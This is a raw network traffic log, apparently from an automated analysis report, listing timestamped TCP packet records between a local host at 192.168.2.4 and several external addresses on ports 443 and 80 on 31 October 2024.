                                                                                                                                            Oct 31, 2024 17:12:40.412478924 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.415958881 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.415975094 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.416034937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.416043043 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.416083097 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.428848028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.428864956 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.428922892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.428930044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.428973913 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.429310083 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.429325104 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.429378033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.429383039 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.429425955 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.430398941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430413008 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430478096 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.430483103 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430516005 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.430869102 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430881977 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430938005 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.430943012 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.430980921 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.431415081 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.431433916 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.431490898 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.431495905 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.431556940 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.442800999 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.442817926 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.442883968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.442892075 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.443378925 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.443620920 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.443634987 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.443687916 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.443691969 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.443957090 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.444159031 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444174051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444231987 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.444235086 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444492102 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.444638014 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444653034 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444703102 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.444708109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.444875956 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445003986 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445040941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445065975 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445070028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445094109 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445118904 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445534945 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445558071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445595026 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445600033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445621014 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445647955 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.445945024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.445959091 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.446012974 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.446017981 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.446197987 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.450128078 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450141907 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450211048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.450215101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450587988 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450606108 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450634003 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.450638056 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.450658083 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.450684071 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.451195955 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.451210022 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.451268911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.451272964 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.451550961 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.453735113 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.453766108 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.453794956 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.453799009 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.453840017 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.454281092 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.454490900 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.454516888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.454544067 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.454547882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.454582930 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.454865932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.454880953 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.454930067 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.454933882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.455172062 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.456183910 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456201077 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456254005 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.456258059 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456468105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456490993 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456531048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.456535101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456561089 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.456583977 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.456971884 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.456990004 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.457040071 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.457045078 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.457317114 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.457335949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.457335949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.457345963 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.457365036 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.457387924 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.480376005 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.480412960 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.480489016 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.480503082 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.480525970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.480725050 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.500886917 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.500955105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.500960112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.500983000 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.500993967 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.501022100 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.501436949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.501449108 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:40.501467943 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.501493931 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:40.961002111 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:40.961379051 CET4976280192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:41.150111914 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:41.150130033 CET8049762185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:41.150238991 CET4976280192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:41.150507927 CET4976280192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:41.155359983 CET8049762185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:43.509567976 CET8049762185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:43.509691954 CET4976280192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:45.017070055 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:45.017108917 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:45.017179966 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:45.019395113 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:45.019407034 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.146883011 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.146950960 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.159112930 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.159132004 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.159533978 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.160031080 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.160059929 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.160124063 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.512988091 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.567380905 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.567409992 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.568180084 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.568203926 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.568460941 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.568496943 CET4434976340.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.568528891 CET49763443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.613249063 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.613286018 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:46.613410950 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.614830971 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:46.614845037 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:47.717668056 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:47.718316078 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:47.718338013 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:47.718956947 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:47.718956947 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:47.718966961 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:47.718985081 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:48.631026983 CET8049762185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:48.631115913 CET4976280192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:56.168982983 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.169018030 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.169193029 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.169858932 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.169869900 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357140064 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357167959 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357182980 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357259035 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.357276917 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357333899 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.357712984 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.357719898 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357733011 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.357884884 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357916117 CET4434976440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.357954979 CET49764443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.423116922 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.423161983 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.423245907 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.423413038 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:56.423428059 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.942863941 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.942956924 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.944736958 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.944746017 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.945148945 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:56.953486919 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:56.999334097 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.208704948 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.208762884 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.208806992 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.208838940 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.208863974 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.208889961 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.208911896 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.210596085 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.210640907 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.210661888 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.210668087 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.210694075 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.210814953 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.210860968 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.222336054 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.222356081 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.222366095 CET49765443192.168.2.420.109.210.53
                                                                                                                                            Oct 31, 2024 17:12:57.222371101 CET4434976520.109.210.53192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.543708086 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.559221983 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:57.559236050 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.559884071 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:57.559889078 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.559916973 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:57.559926033 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.944972038 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:57.945019960 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:57.945091963 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:57.948736906 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:57.948754072 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.244260073 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.244285107 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.244314909 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.244407892 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.244430065 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.244558096 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.252125978 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.252137899 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.252257109 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.252355099 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.252394915 CET4434976640.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.252449036 CET49766443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.275825977 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.275866985 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.275953054 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.276124001 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:58.276139021 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.699803114 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.700036049 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.701651096 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.701661110 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.702030897 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.710916996 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.755340099 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.935693979 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.935729980 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.935749054 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.935986042 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.936012983 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.936072111 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.961651087 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.961677074 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.961765051 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:58.961779118 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:58.961822987 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.054445982 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.054467916 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.054543972 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.054558992 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.054594994 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.054610968 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.080009937 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.080045938 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.080131054 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.080142021 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.080280066 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.081496954 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.081518888 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.081561089 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.081568956 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.081588030 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.081610918 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.084249020 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.084271908 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.084342003 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.084350109 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.084384918 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.174818039 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.174869061 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.174928904 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.174959898 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.175091982 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.175091982 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.197932005 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.197952986 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.198055029 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.198065042 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.198209047 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.198833942 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.198857069 CET4434976713.107.246.43192.168.2.4
